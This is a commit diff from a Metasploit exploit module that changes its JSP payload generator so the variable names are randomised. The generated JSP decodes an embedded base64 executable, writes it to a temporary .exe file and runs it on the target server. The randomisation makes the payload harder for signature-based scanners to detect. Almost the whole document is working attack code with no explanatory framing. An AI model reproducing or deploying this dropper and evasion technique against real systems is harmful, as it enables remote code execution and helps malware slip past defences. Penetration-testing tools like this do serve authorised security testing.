Randomize variable names
parent
923ffe277d
commit
bc3472a9b9
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
#
|
||||
# Generate a download+exe JSP payload
|
||||
# Embeds our executable in JSP
|
||||
#
|
||||
def generate_jsp_payload
|
||||
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
|
||||
|
@ -94,27 +94,35 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
native_payload = Rex::Text.encode_base64(generate_payload_exe)
|
||||
native_payload_name = rand_text_alpha(rand(6)+3)
|
||||
|
||||
var_raw = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
|
||||
jsp = %Q|
|
||||
<%@page import="java.io.*"%>
|
||||
<%@page import="sun.misc.BASE64Decoder"%>
|
||||
|
||||
<%
|
||||
byte[] shellcode = null;
|
||||
BufferedOutputStream outstream = null;
|
||||
byte[] #{var_raw} = null;
|
||||
BufferedOutputStream #{var_ostream} = null;
|
||||
try {
|
||||
String buf = "#{native_payload}";
|
||||
String #{var_buf} = "#{native_payload}";
|
||||
|
||||
BASE64Decoder decoder = new BASE64Decoder();
|
||||
shellcode = decoder.decodeBuffer(buf.toString());
|
||||
BASE64Decoder #{var_decoder} = new BASE64Decoder();
|
||||
#{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
|
||||
|
||||
File temp = File.createTempFile("#{native_payload_name}", ".exe");
|
||||
String path = temp.getAbsolutePath();
|
||||
File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".exe");
|
||||
String #{var_path} = #{var_tmp}.getAbsolutePath();
|
||||
|
||||
outstream = new BufferedOutputStream(new FileOutputStream(path));
|
||||
outstream.write(shellcode);
|
||||
outstream.close();
|
||||
#{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
|
||||
#{var_ostream}.write(#{var_raw});
|
||||
#{var_ostream}.close();
|
||||
|
||||
Process p = Runtime.getRuntime().exec(path);
|
||||
Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
|
||||
} catch (Exception e) {}
|
||||
%>
|
||||
|
|
||||
|
|
Loading…
Reference in New Issue